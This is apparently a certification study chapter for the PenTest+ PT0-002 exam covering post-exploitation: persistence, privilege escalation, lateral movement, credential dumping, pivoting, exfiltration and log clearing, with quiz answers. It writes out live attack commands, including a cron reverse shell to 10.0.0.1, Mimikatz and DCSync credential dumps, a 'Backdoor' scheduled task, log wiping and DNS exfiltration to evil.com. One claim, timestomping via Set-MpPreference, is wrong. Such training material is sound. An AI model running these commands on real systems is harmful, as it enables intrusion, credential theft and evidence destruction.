This chapter covers post-exploitation techniques, a critical phase after initial compromise where attackers establish persistence, escalate privileges, move laterally, and exfiltrate data. For the PT0-002 exam, approximately 15-20% of questions in the 'Attacks and Exploits' domain (Objective 3.4) focus on post-exploitation tactics, including specific tools, commands, and methodologies. Mastery of these concepts is essential for both the multiple-choice and performance-based questions.
Jump to a section
Post-exploitation is like a burglar who has just picked the lock on a back door and entered a large office building. The initial exploit (picking the lock) got them inside, but now they need to achieve their real objective: steal sensitive documents from a locked filing cabinet in the CEO's office on the third floor. First, they must establish a hidden base of operations — maybe a supply closet where they can stash tools and plan without being seen (persistence). They need to map the building: locate security cameras, guard patrol routes, and which doors lead where (privilege escalation and lateral movement). They might need to pick additional locks on internal doors (local privilege escalation) or clone an employee's badge (credential dumping) to access restricted areas. They also need to cover their tracks by disabling alarms, erasing security footage, and avoiding leaving fingerprints (cleaning traces). Every step increases the risk of being caught, so they must act efficiently and quietly. If discovered, they need a quick escape route (exfiltration) or a way to destroy evidence (anti-forensics). The entire operation after the initial break-in mirrors post-exploitation: once the initial foothold is gained, the attacker must pivot, escalate, persist, and exfiltrate while avoiding detection.
What is Post-Exploitation?
Post-exploitation refers to the activities performed after an initial compromise (exploitation) has been achieved. The goal is to maintain access, gather intelligence, expand control, and extract valuable data. In penetration testing, this phase simulates what a real attacker would do once inside the network. The PT0-002 exam expects you to understand the key stages: persistence, privilege escalation, lateral movement, credential dumping, pivoting, and exfiltration.
Persistence Mechanisms
Persistence ensures continued access even after reboots or credential changes. Common methods include:
- Scheduled Tasks: Using schtasks on Windows or cron on Linux to trigger a reverse shell at intervals.
- Registry Run Keys: Adding entries to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce.
- Startup Folders: Placing executables in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.
- Services: Installing malicious services that auto-start (e.g., sc create on Windows).
- DLL Hijacking: Replacing legitimate DLLs with malicious ones that are loaded by trusted processes.
- Web Shells: Uploading a script (e.g., .asp, .php) to a web server that provides remote command execution.
On Linux, common persistence includes:
- SSH Authorized Keys: Adding an attacker's public key to ~/.ssh/authorized_keys.
- Cron Jobs: crontab -e to run a payload periodically.
- Systemd Services: Creating .service files in /etc/systemd/system/.
- .bashrc / .profile: Adding reverse shell commands to shell startup scripts.
Privilege Escalation
Privilege escalation is the process of gaining higher-level permissions (e.g., from user to administrator or SYSTEM). It is divided into:
- Vertical Escalation: Gaining higher privileges on the same host (e.g., exploiting a kernel vulnerability like EternalBlue or using sudo misconfigurations).
- Horizontal Escalation: Accessing another user's account with similar privileges but different resources (e.g., stealing another user's credentials).
Common techniques include:
- Kernel Exploits: Using tools like linux-exploit-suggester to find missing patches.
- Service Misconfigurations: Unquoted service paths, weak service permissions, or services running as SYSTEM.
- Token Manipulation: Duplicating or impersonating access tokens using SeImpersonatePrivilege (e.g., JuicyPotato, RottenPotato).
- DLL Hijacking: Placing a malicious DLL in a directory where a high-privilege process loads it.
- Sudo/Suid Misconfigurations: On Linux, files with SUID bit set that allow command execution as root (e.g., find / -perm -4000 2>/dev/null).
- AlwaysInstallElevated: Windows registry setting that allows any user to install MSI files with SYSTEM privileges.
Lateral Movement
Lateral movement is the technique of moving from one compromised host to another within the same network. Common methods:
- Pass-the-Hash (PtH): Using NTLM hashes instead of plaintext passwords to authenticate to remote systems. Tools: Mimikatz, Impacket (wmiexec, psexec).
- Pass-the-Ticket (PtT): Using Kerberos ticket-granting tickets (TGTs) or service tickets to authenticate. Mimikatz can extract tickets from memory.
- Remote Desktop Protocol (RDP): Using stolen credentials to RDP into other machines.
- Windows Admin Center / PowerShell Remoting: Using WinRM or Enter-PSSession.
- SSH Tunneling: Using SSH to forward ports or execute commands on remote Linux hosts.
- PsExec: Lightweight telnet-replacement for executing processes on remote systems (requires admin credentials).
Credential Dumping
Credential dumping extracts authentication material (hashes, plaintext passwords, tickets) from memory, registry, or disk. Tools:
- Mimikatz: Extracts passwords, hashes, PINs, and Kerberos tickets from LSASS memory. Command: sekurlsa::logonpasswords.
- LaZagne: Dumps passwords from many applications (browsers, mail clients, etc.).
- Windows Credential Manager: cmdkey /list and vaultcmd.
- DCSync: A Mimikatz feature that mimics a Domain Controller to request password hashes for any user from a real DC (requires Domain Admin privileges).
- SAM Registry Hives: Dumping SAM, SYSTEM, and SECURITY hives (e.g., reg save hklm\sam sam.save).
Pivoting and Tunneling
Pivoting uses a compromised host as a relay to reach otherwise inaccessible networks. Techniques:
- Port Forwarding: Using ssh -L (local) or ssh -R (remote) to forward ports.
- Proxychains: Routes traffic through a SOCKS proxy on the compromised host.
- Metasploit pivot: route add commands within a Meterpreter session.
- Dynamic Port Forwarding: ssh -D 1080 user@pivot_host creates a SOCKS proxy.
- Chisel: Fast TCP/UDP tunnel over HTTP.
Data Exfiltration
Exfiltration is the covert extraction of sensitive data. Methods include:
- Encrypted Channels: Using HTTPS, DNS tunneling, or ICMP exfiltration.
- Steganography: Hiding data in images or other files.
- Split and Compress: Using rar, 7z, or gzip with passwords, then splitting into small chunks.
- Cloud Services: Uploading to Google Drive, Dropbox, or AWS S3 via API.
- DNS Tunneling: Encoding data in DNS queries (e.g., data.evil.com). Tools: dnscat2, iodine.
Covering Tracks
Attackers erase evidence of their activity:
- Log Clearing: wevtutil cl System on Windows; truncate -s0 /var/log/auth.log on Linux.
- Timestomping: Changing file timestamps using touch -t on Linux or Set-MpPreference on PowerShell.
- Disabling Logging: Stopping audit services or modifying WEF (Windows Event Forwarding).
- Anti-Forensics: Overwriting free space, deleting prefetch files, and removing registry keys.
Key Tools and Commands for the Exam
Mimikatz: privilege::debug, sekurlsa::logonpasswords, lsadump::dcsync.
Impacket: psexec.py, wmiexec.py, smbexec.py, secretsdump.py.
PowerShell Empire / Starkiller: Post-exploitation agent framework.
CrackMapExec: Swisss army knife for lateral movement (supports SMB, WMI, WinRM, SSH).
BloodHound: Maps Active Directory relationships to find privilege escalation paths.
Netcat / Ncat: For reverse shells and data transfer.
Python one-liners: python -c 'import pty; pty.spawn("/bin/bash")' for shell upgrade.
Interplay with Other Technologies
Post-exploitation often involves: - Active Directory: BloodHound identifies attack paths; DCSync extracts all domain hashes. - Firewalls/IDS: Pivoting bypasses network segmentation; encrypted tunnels evade detection. - Endpoint Protection: Tools like Mimikatz may trigger AV; attackers use process injection or PowerShell downgrade attacks. - Cloud Environments: Exploiting IAM roles, metadata services, and storage buckets for lateral movement.
Exam-Relevant Defaults and Timers
Windows User Account Control (UAC): Bypass techniques (e.g., fodhelper, eventvwr) for privilege escalation.
Kerberos Ticket Lifetime: Default TGT lifetime is 10 hours; service tickets vary.
LSASS Protection (PPL): Windows 8.1+; Mimikatz may need driver loading (mimidrv) to bypass.
Scheduled Task Triggers: At logon, at startup, or on idle (default 10 minutes idle time).
Establish Persistence
After initial compromise, the attacker ensures continued access by installing a persistent backdoor. On Windows, this often involves adding a registry run key (e.g., `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`) or creating a scheduled task that executes a reverse shell every hour. On Linux, adding an SSH authorized key or a cron job is common. The key is to survive reboots and credential changes. The attacker must also consider detection: registry keys may be monitored by EDR, so they might use WMI event subscriptions or DLL hijacking instead. The exam expects you to know specific persistence locations and how to verify them (e.g., `reg query` or `schtasks /query`).
Escalate Privileges
With a foothold, the attacker seeks higher privileges (e.g., Administrator or SYSTEM). Common techniques include exploiting kernel vulnerabilities (e.g., CVE-2021-1732 on Windows) or abusing service misconfigurations like unquoted service paths. The attacker uses tools like `whoami /priv` to list available privileges and `accesschk.exe` to check service permissions. If `SeImpersonatePrivilege` is enabled, tools like JuicyPotato can escalate to SYSTEM. On Linux, `sudo -l` shows allowed commands; a misconfigured sudoers entry for `find` or `vim` can grant root. The exam often tests the difference between vertical and horizontal escalation.
Dump Credentials
Once elevated, the attacker extracts credentials from memory or disk. Mimikatz is the go-to tool: after enabling `privilege::debug`, running `sekurlsa::logonpasswords` dumps plaintext passwords and NTLM hashes from LSASS. Alternatively, `reg save hklm\sam sam.save` saves the SAM hive, which can be cracked offline. On a Domain Controller, DCSync (`lsadump::dcsync /user:krbtgt`) extracts all password hashes. The attacker may also dump browser passwords using LaZagne. Credential dumping is noisy and often triggers AV; attackers may use reflective DLL injection to load Mimikatz in memory.
Move Laterally
With valid credentials, the attacker moves to other hosts. Pass-the-Hash uses NTLM hashes to authenticate via SMB or WMI without knowing the plaintext password. Tools like `psexec.py` from Impacket or `wmiexec.py` execute commands remotely. The attacker uses `net view` or `nslookup` to discover hosts. On domain networks, BloodHound maps trust relationships and identifies target machines. The exam emphasizes that PtH works only if the target is on the same network and has the same local admin password (common in poorly managed environments).
Pivot to Other Networks
The compromised host may be dual-homed or have access to a restricted subnet. The attacker sets up a SOCKS proxy using `ssh -D 1080 user@pivot` or Metasploit's `route add` command. Then, tools like `proxychains` route traffic through the proxy. For example, `proxychains nmap -sT 10.0.0.0/24` scans the internal network. Pivoting often requires careful configuration of routing tables and may involve double-hop tunnels. The exam may ask about the difference between local port forwarding (`-L`) and dynamic port forwarding (`-D`).
Exfiltrate Data
The final step is extracting valuable data. To avoid detection, the attacker encrypts data (e.g., `gpg -c file`) and exfiltrates via HTTPS (looks like normal traffic) or DNS tunneling (splits data into DNS queries). Tools like `dnscat2` create a C2 channel over DNS. Alternatively, data can be uploaded to cloud storage using APIs. The attacker may split large files into chunks (e.g., `split -b 10M file`) and send over multiple sessions. The exam tests knowledge of exfiltration channels and how to detect them (e.g., unusual DNS query sizes).
In a typical enterprise penetration test, the post-exploitation phase begins after the tester gains initial access via a phishing email or web application vulnerability. For example, a tester might compromise a workstation in the sales department. The first step is to establish persistence by adding a scheduled task that calls back to a C2 server every 30 minutes. This ensures that even if the user logs off, access is retained. Next, the tester runs whoami /groups to check domain group memberships. If the user is a local administrator, they can dump credentials using Mimikatz. Often, the same local admin password is reused across many workstations, allowing pass-the-hash to dozens of machines using CrackMapExec. The tester then pivots to a server that has SQL Server installed with sysadmin privileges. From there, they can access the database and exfiltrate customer PII.
In another scenario, a cloud-based penetration test (e.g., AWS) involves compromising an EC2 instance via an exposed SSH key. Post-exploitation includes reading the instance metadata (http://169.254.169.254/latest/meta-data/iam/security-credentials/) to retrieve IAM credentials. With those credentials, the tester can enumerate S3 buckets, launch new instances, or move laterally to other services. Persistence is achieved by creating a new IAM user or modifying a Lambda function to call back to an external server. Exfiltration is often done via S3 cross-region replication or by uploading data to a bucket in the attacker's account.
Common mistakes in real-world deployments include leaving Mimikatz binaries on disk (which AV detects), using default ports for C2 (e.g., 4444), and failing to clean event logs (e.g., wevtutil cl System). Penetration testers must balance speed with stealth; many organizations have EDR solutions that alert on lsass.exe process access. Testers often use process injection (e.g., into explorer.exe) to evade detection. The PT0-002 exam expects you to know these practical considerations.
The PT0-002 exam (Objective 3.4) specifically tests post-exploitation techniques under the 'Attacks and Exploits' domain. You will be asked to identify the correct tool or command for a given scenario. Common wrong answers include: 1. Choosing Pass-the-Hash when the target is not on the same subnet — PtH works only for network authentication; if the target is firewalled, you need pivoting. 2. Selecting 'service misconfiguration' when the question describes a kernel exploit — kernel exploits are for vertical escalation; service misconfigurations are a different vector. 3. Confusing lateral movement with privilege escalation — lateral movement is between hosts; privilege escalation is on the same host. 4. Thinking DCSync works without Domain Admin privileges — DCSync requires replication rights, which typically only Domain Admins have.
Exact values to memorize:
Default Kerberos TGT lifetime: 10 hours.
Mimikatz command sekurlsa::logonpasswords.
Windows service recovery action default: restart after 1 failure.
wevtutil cl clears logs; wevtutil epl exports.
schtasks /create /sc onlogon /tn Backdoor /tr C:\backdoor.exe.
Edge cases:
If LSASS is running as PPL (Protected Process Light), Mimikatz fails unless the mimidrv driver is loaded.
Pass-the-Hash does not work against Microsoft accounts (live.com) or when NTLM is disabled.
On Linux, sudo -l shows allowed commands; if sudo is not installed, you cannot escalate via sudo.
To eliminate wrong answers, focus on the mechanism: if the question mentions 'hash' and 'remote authentication', it's likely PtH. If it mentions 'ticket' and 'Kerberos', it's PtT. If it mentions 'pivot' and 'proxy', think of SSH tunneling or Metasploit route.
Post-exploitation includes persistence, privilege escalation, lateral movement, credential dumping, pivoting, and exfiltration.
Mimikatz command `sekurlsa::logonpasswords` dumps credentials from LSASS; requires `privilege::debug` first.
Pass-the-Hash uses NTLM hashes; works only if NTLM is enabled and target is reachable.
DCSync requires Domain Admin privileges and extracts all domain hashes from a DC.
Common persistence locations: Windows Run keys, Startup folder, scheduled tasks; Linux cron, SSH keys.
BloodHound maps AD attack paths; uses Neo4j database to store graph data.
Pivoting via SSH dynamic port forwarding (`-D`) creates a SOCKS proxy; proxychains routes tools through it.
Always clean logs selectively or clear them only if necessary; clearing logs creates event 1102.
Vertical escalation gains higher privileges on same host; horizontal escalation accesses another user's account.
JuicyPotato exploits `SeImpersonatePrivilege` to escalate to SYSTEM on Windows.
These come up on the exam all the time. Here's how to tell them apart.
Pass-the-Hash (PtH)
Uses NTLM hash for authentication
Works over SMB, WMI, RDP (if NTLM enabled)
Requires local admin hash or domain user hash
No need for plaintext password
Tool: Mimikatz `sekurlsa::logonpasswords` then `misc::pth`
Pass-the-Ticket (PtT)
Uses Kerberos TGT or service ticket
Works over Kerberos-authenticated protocols (e.g., HTTP, SMB)
Requires domain user ticket from memory
No need for password or hash
Tool: Mimikatz `kerberos::ptt` with extracted ticket
Mistake
Mimikatz can always extract plaintext passwords from LSASS.
Correct
Mimikatz can only extract plaintext if the password is stored in reversible form (e.g., WDigest). On Windows 8.1+ with KB2871997, WDigest is disabled by default, so Mimikatz often gets only NTLM hashes, not plaintext.
Mistake
Pass-the-Hash works against any Windows system.
Correct
Pass-the-Hash only works if NTLM authentication is enabled and the target is accessible via SMB, WMI, or RDP. It does not work against Microsoft accounts (e.g., outlook.com) or when NTLM is disabled via Group Policy.
Mistake
Clearing event logs removes all evidence of an attack.
Correct
Clearing logs (e.g., `wevtutil cl System`) creates an event ID 1102 (Security log cleared) that itself is evidence. Advanced attackers only delete specific events or use timestomping to alter log timestamps.
Mistake
Persistence is only needed for long-term access.
Correct
Persistence is critical even for short-term tests because the initial shell may be unstable (e.g., due to network interruptions). A scheduled task that reconnects every 5 minutes ensures continuous access.
Mistake
DCSync can be performed by any domain user.
Correct
DCSync requires the 'Replicating Directory Changes' permission, which is granted only to Domain Admins, Enterprise Admins, and sometimes delegated accounts. A standard user cannot perform DCSync.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Pass-the-hash (PtH) uses an NTLM hash to authenticate to remote systems, typically over SMB or WMI. It does not require the plaintext password. Pass-the-ticket (PtT) uses a Kerberos ticket-granting ticket (TGT) or service ticket to authenticate. PtH works when NTLM is enabled; PtT works in Kerberos environments. Both can be performed with Mimikatz: PtH uses `misc::pth`, PtT uses `kerberos::ptt`.
Common methods include: using Mimikatz's `token::elevate` to impersonate SYSTEM token, exploiting service misconfigurations (e.g., unquoted service path), using JuicyPotato if `SeImpersonatePrivilege` is enabled, or exploiting a kernel vulnerability. The easiest is often `psexec -s` or `sc create` with `LocalSystem` account.
DCSync is a Mimikatz feature that mimics a Domain Controller to request password hashes from a real DC via the DRSUAPI protocol. It requires the 'Replicating Directory Changes' permission (usually Domain Admin). The command is `lsadump::dcsync /domain:example.com /user:krbtgt`.
Add an SSH public key to `~/.ssh/authorized_keys`, create a cron job (`crontab -e`) that runs a reverse shell, or create a systemd service. Example cron: `*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'`.
Use pass-the-hash with CrackMapExec or Impacket's psexec.py if you have local admin hashes. For domain users, use WMI (wmiexec.py) or WinRM. BloodHound can identify the shortest path to a target. Always check network connectivity first with `ping` or `Test-NetConnection`.
Encrypt the data (e.g., `gpg -c file`), then split it into small chunks. Use HTTPS uploads to a cloud service (e.g., Google Drive API) or DNS tunneling (dnscat2). Avoid large outbound transfers; instead, use steganography or hide data in legitimate traffic.
For Linux, use `mimipenguin` to dump passwords from memory, `LaZagne` for application passwords, and `grep` for plaintext passwords in config files. Also check `/etc/shadow` if you have root access. For SSH keys, look in `.ssh/` directories.
You've just covered Post-Exploitation Techniques — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?